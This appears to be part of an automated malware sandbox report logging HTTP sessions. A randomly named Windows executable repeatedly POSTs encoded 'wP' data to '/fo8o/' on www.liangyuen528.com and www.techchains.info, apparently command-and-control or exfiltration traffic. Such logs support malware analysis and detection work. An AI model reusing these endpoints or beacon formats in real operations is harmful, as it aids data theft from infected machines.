Aug 12, 2024 13:02:54.400130033 CEST	1236	IN	Data Raw: 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 Data Ascii: hive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-element-link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-decorat
Aug 12, 2024 13:02:54.400229931 CEST	1236	IN	Data Raw: 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 Data Ascii: nt{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#555}.container-contact-us{text-align:center}.container-contact-us__content{display:in
Aug 12, 2024 13:02:54.400240898 CEST	1236	IN	Data Raw: 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 30 30 2c 32 30 30 2c 32 30 30 2c 2e 37 35 29 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 Data Ascii: al-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0
Aug 12, 2024 13:02:54.400254965 CEST	1224	IN	Data Raw: 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 Data Ascii: b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{backg
Aug 12, 2024 13:02:54.400270939 CEST	1236	IN	Data Raw: 20 47 72 61 6e 64 65 22 2c 73 61 6e 73 2d 73 65 72 69 66 7d 62 6f 64 79 2e 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 2d 65 6e 61 62 6c 65 64 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6f Data Ascii: Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:0;padding-left:5%;padding-right:5%;padding-bottom:10px} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"sing
Aug 12, 2024 13:02:54.400284052 CEST	1236	IN	Data Raw: 22 2c 22 70 75 73 22 3a 22 73 65 73 3d 59 33 4a 6c 50 54 45 33 4d 6a 4d 30 4e 6a 41 31 4e 7a 51 6d 64 47 4e 70 5a 44 31 33 64 33 63 75 63 6e 4e 7a 62 6d 56 33 63 32 4e 68 63 33 51 75 59 32 39 74 4e 6a 5a 69 4f 57 56 69 5a 47 55 7a 5a 44 4e 6a 5a Data Ascii: ","pus":"ses=Y3JlPTE3MjM0NjA1NzQmdGNpZD13d3cucnNzbmV3c2Nhc3QuY29tNjZiOWViZGUzZDNjZTYuNDE4MjU3ODgmdGFzaz1zZWFyY2gmZG9tYWluPXJzc25ld3NjYXN0LmNvbSZhX2lkPTMmc2Vzc2lvbj1lUHcwYTVmdWd4NlE0RGxuLVFEMw==","postActionParameter":{"feedback":"/search/fb.ph

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	54852	15.197.172.60	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:02:59.732410908 CEST	787	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.liangyuen528.com Origin: http://www.liangyuen528.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.liangyuen528.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 76 67 67 45 65 62 73 6b 4c 4e 51 2b 59 70 6c 77 64 34 36 6c 59 58 62 73 38 33 53 46 77 42 69 56 50 35 55 6c 36 77 4d 30 64 4c 59 51 2b 30 72 76 56 4b 73 76 66 37 62 52 4f 30 69 34 6a 75 36 61 71 63 6f 79 45 5a 31 73 73 41 2f 38 53 52 38 4b 58 67 6f 37 49 47 46 48 79 50 6e 58 54 72 31 61 46 37 63 67 6c 52 63 37 38 37 62 56 46 64 65 57 77 47 74 4f 65 6a 6b 64 4d 47 46 70 51 6f 36 69 7a 6b 49 6e 79 62 6c 30 79 43 50 6f 38 33 4c 33 6f 71 55 4c 49 45 59 53 6d 74 69 74 43 30 32 34 6a 49 56 50 49 53 65 4d 4b 61 37 70 5a 45 52 4f 6e 38 4f 79 31 38 33 6f 61 52 66 34 50 6c 7a 71 5a 73 6a 2b 57 61 6e 57 36 6b 6b 56 Data Ascii: wP=vggEebskLNQ+Yplwd46lYXbs83SFwBiVP5Ul6wM0dLYQ+0rvVKsvf7bRO0i4ju6aqcoyEZ1ssA/8SR8KXgo7IGFHyPnXTr1aF7cglRc787bVFdeWwGtOejkdMGFpQo6izkInybl0yCPo83L3oqULIEYSmtitC024jIVPISeMKa7pZEROn8Oy183oaRf4PlzqZsj+WanW6kkV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	54853	15.197.172.60	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:02.267465115 CEST	811	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.liangyuen528.com Origin: http://www.liangyuen528.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.liangyuen528.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 76 67 67 45 65 62 73 6b 4c 4e 51 2b 5a 4a 31 77 66 65 79 6c 51 58 62 74 67 6e 53 46 6d 78 69 52 50 35 59 6c 36 30 55 6b 64 35 4d 51 39 51 76 76 55 49 45 76 59 37 62 52 61 6b 69 35 2b 2b 36 76 71 63 6b 51 45 62 52 73 73 41 62 38 53 51 67 4b 58 54 41 34 4a 57 46 53 37 76 6e 4a 4d 37 31 61 46 37 63 67 6c 52 4a 65 38 37 44 56 47 75 47 57 77 6a 5a 4e 58 44 6b 61 4c 47 46 70 43 59 36 6d 7a 6b 49 56 79 5a 51 76 79 42 6e 6f 38 33 62 33 6f 59 38 45 53 55 59 75 34 74 6a 79 47 58 58 32 6d 72 6f 67 57 78 61 68 58 59 72 65 56 53 51 55 37 50 4f 52 6e 73 58 71 61 54 48 4b 50 46 7a 41 62 73 62 2b 45 4e 72 78 31 51 42 32 59 4b 7a 47 6e 43 44 52 4b 4c 74 34 50 33 77 57 56 4b 46 6d 2f 77 3d 3d Data Ascii: wP=vggEebskLNQ+ZJ1wfeylQXbtgnSFmxiRP5Yl60Ukd5MQ9QvvUIEvY7bRaki5++6vqckQEbRssAb8SQgKXTA4JWFS7vnJM71aF7cglRJe87DVGuGWwjZNXDkaLGFpCY6mzkIVyZQvyBno83b3oY8ESUYu4tjyGXX2mrogWxahXYreVSQU7PORnsXqaTHKPFzAbsb+ENrx1QB2YKzGnCDRKLt4P3wWVKFm/w==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	54854	15.197.172.60	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:04.799329042 CEST	1824	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.liangyuen528.com Origin: http://www.liangyuen528.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.liangyuen528.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 76 67 67 45 65 62 73 6b 4c 4e 51 2b 5a 4a 31 77 66 65 79 6c 51 58 62 74 67 6e 53 46 6d 78 69 52 50 35 59 6c 36 30 55 6b 64 35 55 51 39 6a 33 76 56 70 45 76 5a 37 62 52 5a 6b 69 43 2b 2b 36 32 71 63 4d 55 45 62 74 38 73 43 7a 38 53 79 6f 4b 52 69 41 34 51 6d 46 53 32 50 6e 55 54 72 30 43 46 37 4d 6b 6c 52 5a 65 38 37 44 56 47 76 32 57 35 57 74 4e 56 44 6b 64 4d 47 45 6f 51 6f 36 4f 7a 6b 41 46 79 5a 45 2f 7a 77 48 6f 2f 57 72 33 37 38 63 45 4b 45 59 6f 39 74 6a 36 47 58 62 39 6d 72 30 57 57 79 47 4c 58 59 50 65 58 53 56 52 70 4d 4b 78 39 4f 4b 48 45 6a 54 33 50 68 6a 76 56 4e 54 53 58 66 2f 52 36 45 56 4a 64 64 50 6b 6c 54 36 76 47 34 64 49 41 77 63 42 44 35 4a 72 70 38 57 50 62 47 53 73 63 39 56 35 61 59 51 57 64 6b 6f 31 5a 54 46 4e 37 6e 33 6f 75 4e 52 6f 64 66 7a 2f 34 77 57 73 73 2f 4c 52 7a 31 52 4e 76 34 36 32 76 43 42 36 45 6d 43 6e 6d 4e 44 64 62 31 54 43 50 59 52 55 32 38 6d 6b 6a 45 52 76 38 74 2f 48 70 4d 38 54 6f 6c 7a 61 76 64 66 42 52 4e 58 42 41 70 4c 76 53 46 57 61 6e 76 77 [TRUNCATED] Data Ascii: wP=vggEebskLNQ+ZJ1wfeylQXbtgnSFmxiRP5Yl60Ukd5UQ9j3vVpEvZ7bRZkiC++62qcMUEbt8sCz8SyoKRiA4QmFS2PnUTr0CF7MklRZe87DVGv2W5WtNVDkdMGEoQo6OzkAFyZE/zwHo/Wr378cEKEYo9tj6GXb9mr0WWyGLXYPeXSVRpMKx9OKHEjT3PhjvVNTSXf/R6EVJddPklT6vG4dIAwcBD5Jrp8WPbGSsc9V5aYQWdko1ZTFN7n3ouNRodfz/4wWss/LRz1RNv462vCB6EmCnmNDdb1TCPYRU28mkjERv8t/HpM8TolzavdfBRNXBApLvSFWanvw114cB4cUcKFmXik0jW9n0PdAnvswUY7/Qjff1VtHq8q0sA4p7yq1lEy+WHGDhX5HgbVAoigySwvvv7O70QBx6CflCAiO6/nYrk8uNDyZGSSnjRWUnzazmqOt+GtqwWGd3zTEGhzGVIuqsIveJwyb78IREtAWd3lTyVrqUs0ejk//4hb1/7m1seU5xEZCLn4jLMXgKcXWfBWR49h8kGeio0IHMrOJkY1hvNPX513kTa2RABaeszlUlAfp2OXLS7odx+n2fhMcdamP9XektedJXhjMCvSbPGpPO3IweHStAa5zvsHZPfH7QJkZEcbNXpMRbQ8E/PZjRoSh5AQzB/EVBNeP+B2qCU271qcBm64J7YEyFeWvAN6sDccBmEF3tyd8+w0mw0rCCcdZDYt5FkGkpVEBAy5eIelssM4OwMLFcJ9EL21dyymgI73ZeZDZBovifuazEeqibEVzTzmjE72nQFKh6k1dCU+MkiqwciyUH9nlAP1P91fIFYx/QiWO3RsrXz8CV8FjS1CVdj0pNFvJUlxw/hypZLRKxBAA2OpLo6ktOSejIL4rOG9C0A0gIYNsVezFe0N57p8lL5gA6G9UOc4XdZ1rpK/cr7YMWaGH7YNTxlbm1AqSkJKCQz++kuZcvIcUQ7CAdcfyuye/Fu9q0N79FYzJ0QBDjv [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	54855	15.197.172.60	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:07.330323935 CEST	518	OUT	GET /fo8o/?wP=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8=&fPh4U=MJo4 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.liangyuen528.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Aug 12, 2024 13:03:07.806813955 CEST	405	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 12 Aug 2024 11:03:07 GMT Content-Type: text/html Content-Length: 265 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 50 3d 69 69 49 6b 64 72 42 36 4b 59 63 56 51 6f 4e 30 63 36 43 66 5a 6e 69 49 2b 6c 4b 31 37 77 6d 55 53 4f 63 34 31 79 4d 31 51 2f 6b 39 37 6a 69 4a 63 6f 6b 75 57 50 62 4f 54 78 69 43 6f 64 47 57 69 4f 51 6b 55 72 70 32 31 6c 33 37 65 79 4d 65 4c 54 70 2b 52 46 6b 7a 2b 34 62 7a 44 65 45 4b 4b 71 52 5a 67 41 52 36 71 6f 54 49 4c 74 4f 4c 36 45 64 4a 5a 68 4a 5a 42 6e 46 64 53 50 4f 72 33 30 49 30 32 4d 38 3d 26 66 50 68 34 55 3d 4d 4a 6f 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wP=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8=&fPh4U=MJo4"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	54856	66.29.149.46	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:13.137077093 CEST	784	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 74 71 7a 62 69 56 74 64 67 41 4d 61 68 6b 63 31 58 46 58 6a 46 4e 53 73 7a 55 6d 75 62 7a 39 48 6b 53 50 39 73 4e 6b 41 59 54 57 Data Ascii: wP=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXItqzbiVtdgAMahkc1XFXjFNSszUmubz9HkSP9sNkAYTW
Aug 12, 2024 13:03:13.733136892 CEST	637	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 11:03:13 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	54857	66.29.149.46	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:15.675961971 CEST	808	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 74 51 73 78 4d 55 75 37 7a 58 46 6b 71 50 76 37 42 44 50 73 32 31 61 64 53 4f 32 35 32 66 72 47 63 45 4c 57 46 53 66 35 61 59 71 77 3d 3d Data Ascii: wP=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVtQsxMUu7zXFkqPv7BDPs21adSO252frGcELWFSf5aYqw==
Aug 12, 2024 13:03:16.298863888 CEST	637	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 11:03:16 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	54858	66.29.149.46	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:18.204982042 CEST	1821	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 30 5a 31 79 31 4d 79 36 68 4d 2f 74 4e 50 62 42 6b 57 4b 67 36 6b 30 57 39 43 68 53 39 58 52 2b 37 33 2f 71 56 59 78 49 79 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4c 47 41 37 30 34 44 55 69 68 38 49 33 67 74 6f 6b 32 42 34 6b 32 2b 74 4d 6e 77 59 73 75 2b 63 50 71 48 46 67 57 37 55 4a 4c 63 46 50 73 32 4a 52 65 73 48 2f 41 6f 64 63 65 67 61 43 4e 37 68 68 6f 75 43 35 5a 70 4a 45 73 48 45 69 58 37 63 67 57 37 7a [TRUNCATED] Data Ascii: wP=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8Fx0Z1y1My6hM/tNPbBkWKg6k0W9ChS9XR+73/qVYxIy0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vLGA704DUih8I3gtok2B4k2+tMnwYsu+cPqHFgW7UJLcFPs2JResH/AodcegaCN7hhouC5ZpJEsHEiX7cgW7zuI60JeSi7X7an0pH15nEFNZASgOVRwKFkrNaE1wyZPPVcoETqEHFkiwQyoFxywvqC0x98C7vphzvMl4UgECr9egoFU931MrywlRSAvRkl0e8P11lRLj7GV76LpQF0Pibup/5EyCNfcqy3KyNvNQlrDySsuHSTnzn35//5EHg1Id9+xzb3N84ccRPci1sr11Sz1pxot0S1pzvIHPROmGpe/8E0AaJDSwmVzRef/T9hjapGA6qGEEDpeKNE5ez26JQFhPh5i9e+fT3yM9O8mqm12VMElzf+AfzUE530juFIlx6+dECOKyNlB2PpiPuOQi6iQXCgjxsCMuQyXyVkr33be3+V8yLwPjwsZ289Nr/FmWE4+zL/YgH9bJtGFY0u0sdyjWxeNX8j8mvAVJ97iJRUthMq3it